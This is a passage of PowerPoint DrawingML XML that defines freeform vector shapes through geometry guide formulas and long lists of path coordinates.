                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 189"/>
                  <a:gd name="T97" fmla="*/ 0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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 189"/>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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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5142" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
